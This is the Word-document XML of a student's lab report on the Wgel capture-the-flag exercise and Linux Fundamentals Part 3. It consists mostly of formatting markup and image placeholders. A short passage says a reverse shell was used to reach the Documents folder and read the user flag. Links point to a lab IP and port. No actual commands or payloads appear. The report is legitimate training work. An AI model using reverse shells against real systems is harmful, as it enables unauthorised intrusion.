          </w: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28513624" w14:textId="350BDCFE" w:rsidR="007F34DA" w:rsidRDefault="007F34DA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Then with the help of reverse shell we</w:t>
          </w:r>
          <w:r w:rsidR="00EE1F40">
            <w:rPr>
              <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              <w:b/>
              <w:bCs/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:t xml:space="preserve"> got the user file which in in documents folder. Then using ls command we got the user_flag.txt </w:t>
          </w:r>
          <w:proofErr w:type="spellStart"/>
          <w:r w:rsidR="00EE1F40">
            <w:rPr>
              <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              <w:b/>
              <w:bCs/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:t>file.And</w:t>
          </w:r>
          <w:proofErr w:type="spellEnd"/>
          <w:r w:rsidR="00EE1F40">
            <w:rPr>
              <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              <w:b/>
              <w:bCs/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:t xml:space="preserve"> with the cat command we got the user flag.</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="253B9D13" w14:textId="25F4BA37" w:rsidR="00EE1F40" w:rsidRPr="007F34DA" w:rsidRDefault="00EE1F40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389893A4" wp14:editId="3C850B4C">
                <wp:extent cx="4459452" cy="103734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7" t="9547" r="63751" b="76626"/>
                        <a:stretch/>
                      </pic:blipFill>
                      <pic:spPr bwMode="auto">
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="4481385" cy="1042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BBCC48A" w14:textId="77777777" w:rsidR="00BD217B" w:rsidRDefault="00BD217B" w:rsidP="00EE1F40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3CCE256" w14:textId="02BCD514" w:rsidR="00BD217B" w:rsidRDefault="00BD217B" w:rsidP="00BD217B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>
            <w:rPr>
              <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              <w:b/>
              <w:bCs/>
              <w:szCs w:val="28"/>
            </w:rPr>
            <w:t>steps performed on L</w:t>
          </w:r>
          <w:r w:rsidRPr="00BD217B">
            <w:rPr>
              <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              <w:b/>
              <w:bCs/>
              <w:szCs w:val="28"/>
            </w:rPr>
            <w:t>inux</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              <w:b/>
              <w:bCs/>
              <w:szCs w:val="28"/>
            </w:rPr>
            <w:t xml:space="preserve"> F</w:t>
          </w:r>
          <w:r w:rsidRPr="00BD217B">
            <w:rPr>
              <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              <w:b/>
              <w:bCs/>
              <w:szCs w:val="28"/>
            </w:rPr>
            <w:t>undamentals</w:t>
          </w:r>
          <w:r w:rsidR="00565CCA">
            <w:rPr>
              <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              <w:b/>
              <w:bCs/>
              <w:szCs w:val="28"/>
            </w:rPr>
            <w:t xml:space="preserve"> Part </w:t>
          </w:r>
          <w:r w:rsidR="00EE1F40">
            <w:rPr>
              <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              <w:b/>
              <w:bCs/>
              <w:szCs w:val="28"/>
            </w:rPr>
            <w:t>3</w:t>
          </w:r>
          <w:r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2613CEFE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60F8A044" w14:textId="4BC07468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BD217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:</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="313E9D36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5A77F554" w14:textId="202A7DA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  <w:u w:val="single"/>
            </w:rPr>
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="192323D2" wp14:editId="54F2063A">
                <wp:extent cx="5731053" cy="2243738"/>
                <wp:effectExtent l="0" t="0" r="317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64" b="19433"/>
                        <a:stretch/>
                      </pic:blipFill>
                      <pic:spPr bwMode="auto">
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5731510" cy="22439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29412C" w14:textId="18527956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72B6011C" w14:textId="3C43D2D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B557DFE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9CF45A1" w14:textId="4F6BA386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BD217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</w:p>
        <w:p w14:paraId="6F6D3613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6C4BF04D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2F125BA1" w14:textId="037919B3" w:rsidR="00020E1C" w:rsidRDefault="001F38F0" w:rsidP="001F38F0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  <w:u w:val="single"/>
            </w:rPr>
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="554A9CAF" wp14:editId="1EB52376">
                <wp:extent cx="5730427" cy="2250920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7" b="17770"/>
                        <a:stretch/>
                      </pic:blipFill>
                      <pic:spPr bwMode="auto">
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5731510" cy="225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51EE0D" w14:textId="539049E0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616F0664" w14:textId="7B55195E" w:rsidR="001F38F0" w:rsidRDefault="001F38F0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ABB32B3" w14:textId="77777777" w:rsidR="001F38F0" w:rsidRDefault="001F38F0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58265C43" w14:textId="4A94A0C5" w:rsidR="00A85722" w:rsidRDefault="00A85722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3:</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="42E871B2" w14:textId="6A5E821E" w:rsidR="001F38F0" w:rsidRDefault="001F38F0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6B2AB8A" w14:textId="77777777" w:rsidR="001F38F0" w:rsidRDefault="001F38F0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22F3565" w14:textId="0FD4DF4F" w:rsidR="001F38F0" w:rsidRDefault="001F38F0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74879663" wp14:editId="10A1591E">
                <wp:extent cx="5731317" cy="2497311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07" b="6327"/>
                        <a:stretch/>
                      </pic:blipFill>
                      <pic:spPr bwMode="auto">
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5731510" cy="2497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AE53C6" w14:textId="4F244979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04D0C02E" w14:textId="77777777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7A16980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80D3EAD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AD4682A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2E0E77ED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5F88CB3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1F7636C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E4041DB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5DA2AF79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082EF6F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9B675CD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8A4E075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576951BE" w14:textId="295A8C4D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020E1C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</w:p>
        <w:p w14:paraId="11C527B0" w14:textId="77777777" w:rsidR="001F38F0" w:rsidRPr="00020E1C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E71C63A" w14:textId="53541088" w:rsidR="00565CCA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5B0B1CC7" wp14:editId="545BE34C">
                <wp:extent cx="5730259" cy="2412787"/>
                <wp:effectExtent l="0" t="0" r="3810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01" b="10842"/>
                        <a:stretch/>
                      </pic:blipFill>
                      <pic:spPr bwMode="auto">
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5731510" cy="2413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DCEA7F6" w14:textId="77777777" w:rsidR="00020E1C" w:rsidRDefault="00020E1C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C0E832D" w14:textId="44EEEE63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020E1C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Step 5:</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="1D3C3218" w14:textId="77777777" w:rsidR="001F38F0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5108CC2" w14:textId="5F7B28CC" w:rsidR="001F38F0" w:rsidRPr="00020E1C" w:rsidRDefault="001F38F0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12D8F11B" wp14:editId="27A647DE">
                <wp:extent cx="5730955" cy="1805524"/>
                <wp:effectExtent l="0" t="0" r="3175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33" b="28258"/>
                        <a:stretch/>
                      </pic:blipFill>
                      <pic:spPr bwMode="auto">
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5731510" cy="18056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CB2419" w14:textId="0EFA8819" w:rsidR="00565CCA" w:rsidRPr="00A85722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334A93F" w14:textId="77777777" w:rsidR="00A85722" w:rsidRPr="00BD217B" w:rsidRDefault="00A85722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4C8C9B9" w14:textId="77777777" w:rsidR="001F38F0" w:rsidRDefault="001F38F0" w:rsidP="00020E1C">
          <w:pPr>
            <w:ind w:left="6480" w:firstLine="720"/>
            <w:jc w:val="center"/>
          </w:pPr>
        </w:p>
        <w:p w14:paraId="6D8C92F7" w14:textId="481FB869" w:rsidR="001F38F0" w:rsidRDefault="001F38F0" w:rsidP="00020E1C">
          <w:pPr>
            <w:ind w:left="6480" w:firstLine="720"/>
            <w:jc w:val="center"/>
          </w:pPr>
        </w:p>
        <w:p w14:paraId="764DD1BD" w14:textId="0B9248E6" w:rsidR="00020E1C" w:rsidRDefault="00823CBF" w:rsidP="00020E1C">
          <w:pPr>
            <w:ind w:left="6480" w:firstLine="720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20EF97" wp14:editId="57DABF86">
                    <wp:simplePos x="0" y="0"/>
                    <wp:positionH relativeFrom="column">
                      <wp:posOffset>4068552</wp:posOffset>
                    </wp:positionH>
                    <wp:positionV relativeFrom="paragraph">
                      <wp:posOffset>7807896</wp:posOffset>
                    </wp:positionV>
                    <wp:extent cx="1941195" cy="852170"/>
                    <wp:effectExtent l="0" t="0" r="20955" b="241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1195" cy="852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1E2BF" w14:textId="77777777" w:rsidR="00823CBF" w:rsidRDefault="00823CBF" w:rsidP="00823CBF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2094C5CE" w14:textId="77777777" w:rsidR="00823CBF" w:rsidRDefault="00823CBF" w:rsidP="00823CBF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0BF66BDF" w14:textId="551DBF2E" w:rsidR="00823CBF" w:rsidRPr="00823CBF" w:rsidRDefault="00823CBF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0EF97" id="Text Box 2" o:spid="_x0000_s1030" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:320.35pt;margin-top:614.8pt;width:152.85pt;height:67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">
                    <v:textbox>
                      <w:txbxContent>
                        <w:p w14:paraId="7EF1E2BF" w14:textId="77777777" w:rsidR="00823CBF" w:rsidRDefault="00823CBF" w:rsidP="00823CBF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2094C5CE" w14:textId="77777777" w:rsidR="00823CBF" w:rsidRDefault="00823CBF" w:rsidP="00823CBF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0BF66BDF" w14:textId="551DBF2E" w:rsidR="00823CBF" w:rsidRPr="00823CBF" w:rsidRDefault="00823CBF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0E1C">
            <w:t xml:space="preserve">   </w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="6235A246" w14:textId="3026D7CF" w:rsidR="008234ED" w:rsidRPr="00020E1C" w:rsidRDefault="00020E1C" w:rsidP="00823CBF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 </w:t>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:sectPr w:rsidR="008234ED" w:rsidRPr="00020E1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74"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3FD2C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61962"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="DF3EF1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929EA"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="715A1C7E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23075B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D6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3"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2A9E6D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7A660C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="471C7E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0513A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="CFF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E108D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="45F06D8E"/>
    <w:lvl w:ilvl="0" w:tplc="F1F8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7A280B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="CC9AAC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E862A0"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B1605D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C67B6"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E53E16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197499"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C59C77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482A85"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FC9CB7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B5419D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F092B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769E4"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1D9AF42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AB6616"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3A4CCF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B54CFD"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B5807EE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42"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1689020013">
    <w:abstractNumId w:val="25"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1297906300">
    <w:abstractNumId w:val="30"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="1654024023">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="1018041305">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="933174489">
    <w:abstractNumId w:val="35"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="1676688477">
    <w:abstractNumId w:val="40"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="1758939093">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="201674574">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="255210399">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="1408842682">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="1715306178">
    <w:abstractNumId w:val="21"/>
  </w:num>
  <w:num w:numId="13" w16cid:durableId="792793575">
    <w:abstractNumId w:val="38"/>
  </w:num>
  <w:num w:numId="14" w16cid:durableId="693195775">
    <w:abstractNumId w:val="23"/>
  </w:num>
  <w:num w:numId="15" w16cid:durableId="1053702205">
    <w:abstractNumId w:val="27"/>
  </w:num>
  <w:num w:numId="16" w16cid:durableId="1449200327">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="17" w16cid:durableId="1835491912">
    <w:abstractNumId w:val="28"/>
  </w:num>
  <w:num w:numId="18" w16cid:durableId="1765224307">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="19" w16cid:durableId="291519848">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="20" w16cid:durableId="2031101440">
    <w:abstractNumId w:val="41"/>
  </w:num>
  <w:num w:numId="21" w16cid:durableId="965311786">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="22" w16cid:durableId="1707757652">
    <w:abstractNumId w:val="37"/>
  </w:num>
  <w:num w:numId="23" w16cid:durableId="1366179471">
    <w:abstractNumId w:val="29"/>
  </w:num>
  <w:num w:numId="24" w16cid:durableId="2062164861">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="25" w16cid:durableId="1427726248">
    <w:abstractNumId w:val="36"/>
  </w:num>
  <w:num w:numId="26" w16cid:durableId="1775975439">
    <w:abstractNumId w:val="26"/>
  </w:num>
  <w:num w:numId="27" w16cid:durableId="2129934903">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="28" w16cid:durableId="366175604">
    <w:abstractNumId w:val="31"/>
  </w:num>
  <w:num w:numId="29" w16cid:durableId="2057117666">
    <w:abstractNumId w:val="32"/>
  </w:num>
  <w:num w:numId="30" w16cid:durableId="1264336373">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="31" w16cid:durableId="1728456692">
    <w:abstractNumId w:val="22"/>
  </w:num>
  <w:num w:numId="32" w16cid:durableId="749808452">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="33" w16cid:durableId="413477094">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="34" w16cid:durableId="2030133267">
    <w:abstractNumId w:val="24"/>
  </w:num>
  <w:num w:numId="35" w16cid:durableId="510727241">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="36" w16cid:durableId="1659846588">
    <w:abstractNumId w:val="39"/>
  </w:num>
  <w:num w:numId="37" w16cid:durableId="670329759">
    <w:abstractNumId w:val="33"/>
  </w:num>
  <w:num w:numId="38" w16cid:durableId="1966503172">
    <w:abstractNumId w:val="34"/>
  </w:num>
  <w:num w:numId="39" w16cid:durableId="1942445692">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="40" w16cid:durableId="848904962">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="41" w16cid:durableId="1479112532">
    <w:abstractNumId w:val="20"/>
  </w:num>
  <w:num w:numId="42" w16cid:durableId="2135975263">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="43" w16cid:durableId="10750131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0E1C"/>
    <w:rsid w:val="0002202B"/>
    <w:rsid w:val="0002409A"/>
    <w:rsid w:val="00026728"/>
    <w:rsid w:val="0004304B"/>
    <w:rsid w:val="000768A8"/>
    <w:rsid w:val="000C3045"/>
    <w:rsid w:val="000C4EF6"/>
    <w:rsid w:val="000D11C9"/>
    <w:rsid w:val="000D34CC"/>
    <w:rsid w:val="000F208F"/>
    <w:rsid w:val="000F2EAC"/>
    <w:rsid w:val="00133AE4"/>
    <w:rsid w:val="001627DC"/>
    <w:rsid w:val="0017241E"/>
    <w:rsid w:val="0019470D"/>
    <w:rsid w:val="001B5931"/>
    <w:rsid w:val="001F288F"/>
    <w:rsid w:val="001F38F0"/>
    <w:rsid w:val="001F7ABF"/>
    <w:rsid w:val="001F7B45"/>
    <w:rsid w:val="00202DEA"/>
    <w:rsid w:val="002144E3"/>
    <w:rsid w:val="00215AE1"/>
    <w:rsid w:val="0026386E"/>
    <w:rsid w:val="00265A00"/>
    <w:rsid w:val="0026644D"/>
    <w:rsid w:val="0027330C"/>
    <w:rsid w:val="002839AA"/>
    <w:rsid w:val="0029226C"/>
    <w:rsid w:val="002C6156"/>
    <w:rsid w:val="002D3BBA"/>
    <w:rsid w:val="002E3D2F"/>
    <w:rsid w:val="002E6D5F"/>
    <w:rsid w:val="003127E0"/>
    <w:rsid w:val="00314ED8"/>
    <w:rsid w:val="00315AE1"/>
    <w:rsid w:val="00356620"/>
    <w:rsid w:val="0039575A"/>
    <w:rsid w:val="003A4D5F"/>
    <w:rsid w:val="003C6D66"/>
    <w:rsid w:val="003E45C3"/>
    <w:rsid w:val="003E7458"/>
    <w:rsid w:val="003F1204"/>
    <w:rsid w:val="003F6017"/>
    <w:rsid w:val="00422862"/>
    <w:rsid w:val="00450174"/>
    <w:rsid w:val="004725AE"/>
    <w:rsid w:val="004725EC"/>
    <w:rsid w:val="00473AEB"/>
    <w:rsid w:val="004841A8"/>
    <w:rsid w:val="0049217F"/>
    <w:rsid w:val="00493FD1"/>
    <w:rsid w:val="004C6CD4"/>
    <w:rsid w:val="004E70E8"/>
    <w:rsid w:val="004F5D52"/>
    <w:rsid w:val="005175B7"/>
    <w:rsid w:val="00525B2F"/>
    <w:rsid w:val="00544C7D"/>
    <w:rsid w:val="00565CCA"/>
    <w:rsid w:val="00580A12"/>
    <w:rsid w:val="00582F59"/>
    <w:rsid w:val="005B6F93"/>
    <w:rsid w:val="005D1FAA"/>
    <w:rsid w:val="005D43ED"/>
    <w:rsid w:val="0061069F"/>
    <w:rsid w:val="00620DD9"/>
    <w:rsid w:val="0063015B"/>
    <w:rsid w:val="0063602B"/>
    <w:rsid w:val="00661A78"/>
    <w:rsid w:val="006B140F"/>
    <w:rsid w:val="006B3C45"/>
    <w:rsid w:val="006F0CC8"/>
    <w:rsid w:val="00715B3F"/>
    <w:rsid w:val="00715BE5"/>
    <w:rsid w:val="00720D07"/>
    <w:rsid w:val="0072714C"/>
    <w:rsid w:val="00744BC2"/>
    <w:rsid w:val="00747E4E"/>
    <w:rsid w:val="00747F89"/>
    <w:rsid w:val="00750018"/>
    <w:rsid w:val="0075192E"/>
    <w:rsid w:val="00752783"/>
    <w:rsid w:val="007D1ECE"/>
    <w:rsid w:val="007E3F7B"/>
    <w:rsid w:val="007F34DA"/>
    <w:rsid w:val="00811A25"/>
    <w:rsid w:val="00813A22"/>
    <w:rsid w:val="008234ED"/>
    <w:rsid w:val="00823CBF"/>
    <w:rsid w:val="00826738"/>
    <w:rsid w:val="00861D1E"/>
    <w:rsid w:val="008637F2"/>
    <w:rsid w:val="008800A0"/>
    <w:rsid w:val="00881127"/>
    <w:rsid w:val="00896E26"/>
    <w:rsid w:val="008A599E"/>
    <w:rsid w:val="008C66A5"/>
    <w:rsid w:val="008E2EA9"/>
    <w:rsid w:val="008F596A"/>
    <w:rsid w:val="00947F59"/>
    <w:rsid w:val="00950C3E"/>
    <w:rsid w:val="00965B7F"/>
    <w:rsid w:val="00985C28"/>
    <w:rsid w:val="009A4773"/>
    <w:rsid w:val="009A70C5"/>
    <w:rsid w:val="009C5A06"/>
    <w:rsid w:val="009F61C3"/>
    <w:rsid w:val="00A3311E"/>
    <w:rsid w:val="00A63160"/>
    <w:rsid w:val="00A73B55"/>
    <w:rsid w:val="00A7466B"/>
    <w:rsid w:val="00A85722"/>
    <w:rsid w:val="00A90444"/>
    <w:rsid w:val="00A92D62"/>
    <w:rsid w:val="00AA07F4"/>
    <w:rsid w:val="00AC136F"/>
    <w:rsid w:val="00AE7596"/>
    <w:rsid w:val="00B364DC"/>
    <w:rsid w:val="00B42E42"/>
    <w:rsid w:val="00B777BD"/>
    <w:rsid w:val="00BA370F"/>
    <w:rsid w:val="00BB46BA"/>
    <w:rsid w:val="00BC0B85"/>
    <w:rsid w:val="00BC13CE"/>
    <w:rsid w:val="00BC31CC"/>
    <w:rsid w:val="00BC4E96"/>
    <w:rsid w:val="00BC56F5"/>
    <w:rsid w:val="00BD096A"/>
    <w:rsid w:val="00BD217B"/>
    <w:rsid w:val="00BD4BA6"/>
    <w:rsid w:val="00BE33D9"/>
    <w:rsid w:val="00BF2C5C"/>
    <w:rsid w:val="00C028C5"/>
    <w:rsid w:val="00C07555"/>
    <w:rsid w:val="00C11ADE"/>
    <w:rsid w:val="00C27A1F"/>
    <w:rsid w:val="00C4368F"/>
    <w:rsid w:val="00C4529B"/>
    <w:rsid w:val="00C66297"/>
    <w:rsid w:val="00C671A1"/>
    <w:rsid w:val="00C769DB"/>
    <w:rsid w:val="00C771D9"/>
    <w:rsid w:val="00C9204B"/>
    <w:rsid w:val="00C94EC5"/>
    <w:rsid w:val="00CB2C8A"/>
    <w:rsid w:val="00CD2246"/>
    <w:rsid w:val="00CE0E3A"/>
    <w:rsid w:val="00D40DBE"/>
    <w:rsid w:val="00D47E8B"/>
    <w:rsid w:val="00D640B0"/>
    <w:rsid w:val="00D82D96"/>
    <w:rsid w:val="00D92D79"/>
    <w:rsid w:val="00DA1E46"/>
    <w:rsid w:val="00DA4B5A"/>
    <w:rsid w:val="00E112CB"/>
    <w:rsid w:val="00E165DC"/>
    <w:rsid w:val="00E20EFD"/>
    <w:rsid w:val="00E21CD7"/>
    <w:rsid w:val="00E33673"/>
    <w:rsid w:val="00E50430"/>
    <w:rsid w:val="00E511A0"/>
    <w:rsid w:val="00E61EB7"/>
    <w:rsid w:val="00EE1F40"/>
    <w:rsid w:val="00EE3915"/>
    <w:rsid w:val="00EE50A2"/>
    <w:rsid w:val="00F0307E"/>
    <w:rsid w:val="00F058C3"/>
    <w:rsid w:val="00F42A12"/>
    <w:rsid w:val="00F44B5A"/>
    <w:rsid w:val="00F50B79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5E04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gel.thm/sitemap/" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://10.10.150.46:1234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gel.thm/sitemap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gel.th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649B4"/>
    <w:rsid w:val="002C2FD4"/>
    <w:rsid w:val="002E3E2A"/>
    <w:rsid w:val="00430605"/>
    <w:rsid w:val="00440A16"/>
    <w:rsid w:val="005655AE"/>
    <w:rsid w:val="0063371C"/>
    <w:rsid w:val="007B7A89"/>
    <w:rsid w:val="00845F09"/>
    <w:rsid w:val="00856CE5"/>
    <w:rsid w:val="008579FF"/>
    <w:rsid w:val="008B6F0E"/>
    <w:rsid w:val="008C195A"/>
    <w:rsid w:val="00A40E07"/>
    <w:rsid w:val="00AB57F3"/>
    <w:rsid w:val="00C31BD8"/>
    <w:rsid w:val="00C56F4C"/>
    <w:rsid w:val="00CC2301"/>
    <w:rsid w:val="00CE4C78"/>
    <w:rsid w:val="00CE5BE0"/>
    <w:rsid w:val="00D24676"/>
    <w:rsid w:val="00D6615F"/>
    <w:rsid w:val="00DC5704"/>
    <w:rsid w:val="00D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PERFORMED ON WGEL CTF AND LINUX FUNDAMENTAL’S PART 3</dc:title>
  <dc:subject/>
  <dc:creator>Prasanti</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Prashanti Ivaturi</cp:lastModifiedBy>
  <cp:revision>6</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-07-16T13:29:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-07-18T05:24:00Z</dcterms:modified>
</cp:coreProperties>
</file>